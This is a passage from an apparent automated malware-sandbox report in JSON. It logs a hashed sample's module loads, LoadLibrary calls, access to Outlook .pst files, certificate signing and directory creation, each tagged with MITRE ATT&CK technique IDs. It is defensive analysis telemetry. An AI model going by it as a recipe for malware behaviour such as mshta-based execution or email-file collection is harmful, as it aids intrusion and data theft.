base 76730000\n \"mshta.exe\" loaded module \"USERENV.DLL\" at base 75bb0000\n \"mshta.exe\" loaded module \"CREDSSP.DLL\" at base 75020000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCHANNEL.DLL\" at base 75160000\n \"mshta.exe\" loaded module \"NCRYPT.DLL\" at base 75490000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL\" at base 75030000\n \"mshta.exe\" loaded module \"GPAPI.DLL\" at base 74f30000\n \"mshta.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77be0000\n \"mshta.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77be0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CRYPTNET.DLL\" at base 71bd0000\n \"mshta.exe\" loaded module \"CRYPTNET.DLL\" at base 71bd0000\n \"mshta.exe\" loaded module \"SENSAPI.DLL\" at base 6d1c0000\n \"mshta.exe\" loaded module \"SSPICLI.DLL\" at base 757e0000\n \"mshta.exe\" loaded module \"NTDLL.DLL\" at base 77a50000\n \"mshta.exe\" loaded module \"NSI.DLL\" at base 77bd0000\n \"mshta.exe\" loaded module \"CFGMGR32.DLL\" at base 75c60000\n \"mshta.exe\" loaded module \"CABINET.DLL\" at base 70ef0000\n \"mshta.exe\" loaded module \"DEVRTL.DLL\" at base 750d0000\n \"mshta.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77be0000\n \"mshta.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CRYPT32.DLL\" at base 759a0000\n \"cmd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75800000\n \"cmd.exe\" loaded module \"NTDLL.DLL\" at base 77a50000\n \"taskkill.exe\" loaded module \"KERNEL32.DLL\" at base 75f20000\n \"taskkill.exe\" loaded module \"CRYPTSP.DLL\" at base 75360000\n \"taskkill.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 750f0000\n \"taskkill.exe\" loaded module \"ADVAPI32.DLL\" at base 768d0000\n \"taskkill.exe\" loaded module \"CRYPTBASE.DLL\" at base 75850000\n \"taskkill.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 758f0000\n \"taskkill.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\WBEMSVC.DLL\" at base 6e670000\n \"taskkill.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WBEM\\FASTPROX.DLL\" at base 6e100000\n \"taskkill.exe\" loaded module \"OLEAUT32.DLL\" at base 77c00000\n \"PING.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71020000\n \"PING.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"PING.EXE\" loaded module \"KERNEL32\" at base 75f20000\n \"PING.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"PING.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75320000\n \"PING.EXE\" loaded module \"WSHTCPIP\" at base 74e80000\n \"PING.EXE\" loaded module \"WSHIP6.DLL\" at base 75310000\n \"PING.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\WSHQOS.DLL\" at base 72180000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter midimap.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter crypt32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter gdiplus.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter NTDLL (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter mpr.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter netapi32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter SAMCLI (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter NETUTILS (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter oleaut32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter powrprof.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter shlwapi.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter ws2_32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\WinSxS\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23894_none_5c0be957a009922e\\gdiplus.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter WindowsCodecs.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IconCodecService.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter OLEACCRC.DLL (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\Windows Photo Viewer\\PhotoBase.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter SETUPAPI.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter SHFOLDER.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter mfplat (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter MMDevAPI.DLL (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter wdmaud.drv (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\drprov.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\ntlanman.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\davclnt.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter cscapi.dll (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"LoadLibrary\" with a parameter netutils.dll (UID: 00000000-00003064)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %PROGRAMFILES%\\Microsoft Office\\Office14\\outllib.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\mshtml.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter OLEACCRC.DLL (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter OLEACC.DLL (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\Oleacc.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\Msimtf.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter mshtml.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter d2d1.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter DWrite.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter dxgi.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\DXGIDebug.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\DXGIDebug.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter setupapi.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter WINTRUST.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter vm3dum_loader.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter XmlLite.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter DXGI.DLL (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter d3d11.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter D3D10Warp.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\D3D10Warp.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\advapi32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter MLANG.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter WININET.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-winrt-l1-1-0.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter msls31.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter CRYPT32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter dwrite.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\msxml3r.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter USERENV.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter secur32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter ncrypt.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\System32\\cryptnet.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter cryptnet.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter SensApi.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter WINHTTP.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter RPCRT4.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter NSI.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter CFGMGR32.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter profapi.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter Cabinet.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter DEVRTL.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00003044)\n \"mshta.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00003044)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter NTDLL.DLL (UID: 00000000-00003404)\n \"taskkill.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\taskkill.exe (UID: 00000000-00002988)\n \"taskkill.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002988)\n \"taskkill.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002988)\n \"PING.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002080)\n \"PING.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002080)\n \"PING.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002080)\n \"PING.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002080)\n \"PING.EXE\" called \"LoadLibrary\" with a parameter wshtcpip (UID: 00000000-00002080)\n \"PING.EXE\" called \"LoadLibrary\" with a parameter wship6.dll (UID: 00000000-00002080)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-158", "type": 6, "relevance": 3, "name": "Attempts to write Outlook-related files (file access)", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes file \"C:\\Users\\%OSUSER%\\Documents\\Outlook Files\\Outlook.pst\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" writes file \"%USERPROFILE%\\Documents\\Outlook Files\\Outlook.pst\"", "origin": "API Call", "attck_id": "T1114.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-157", "type": 6, "relevance": 3, "name": "Attempts to read Outlook-related files (file access)", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" tries to access a file \"C:\\Users\\%OSUSER%\\Documents\\Outlook Files\\Outlook.pst\"\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" tries to access a file \"%USERPROFILE%\\Documents\\Outlook Files\\Outlook.pst\"", "origin": "API Call", "attck_id": "T1114.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "certificate-0", "type": 17, "relevance": 10, "name": "The input sample is signed with a certificate", "description": "The input sample is signed with a certificate issued by \"CN=GlobalSign GCC R6 AlphaSSL CA 2023, O=GlobalSign nv-sa, C=BE\" (SHA1: 64:9E:82:1E:44:9F:33:97:5C:B5:EA:B0:FE:24:FC:BE:CF:3A:6F:B6; see report for more information)\n The input sample is signed with a certificate issued by \"CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R6\" (SHA1: 80:94:64:0E:B5:A7:A1:CA:11:9C:1F:DD:D5:9F:81:02:63:A7:FB:D1; see report for more information)\n The input sample is signed with a certificate issued by \"CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R6\" (SHA1: 58:F6:A6:8D:38:86:7D:61:B3:46:F3:BB:29:8B:CB:0F:CD:D3:0A:99; see report for more information)\n The input sample is signed with a certificate issued by \"CN=WE1, O=Google Trust Services, C=US\" (SHA1: 86:D4:0D:BC:22:B0:15:BF:35:5D:BA:F6:9D:A8:A7:7B:65:A3:FE:99; see report for more information)\n The input sample is signed with a certificate issued by \"CN=GTS Root R4, O=Google Trust Services LLC, C=US\" (SHA1: 10:8F:BF:79:4E:18:EC:53:47:A4:14:E4:37:0C:C4:50:6C:29:7A:B2; see report for more information)\n The input sample is signed with a certificate issued by \"CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE\" (SHA1: 93:2B:ED:33:9A:A6:92:12:C8:93:75:B7:93:04:B4:75:49:0B:89:A0; see report for more information)", "origin": "Certificate Data", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateDirectoryW\" with parameter %TEMP%\\733c94c5 (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\ (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Speech\\ (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Speech\\Files\\ (UID: 00000000-00003064)\n \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"CreateDirectoryW\" with parameter 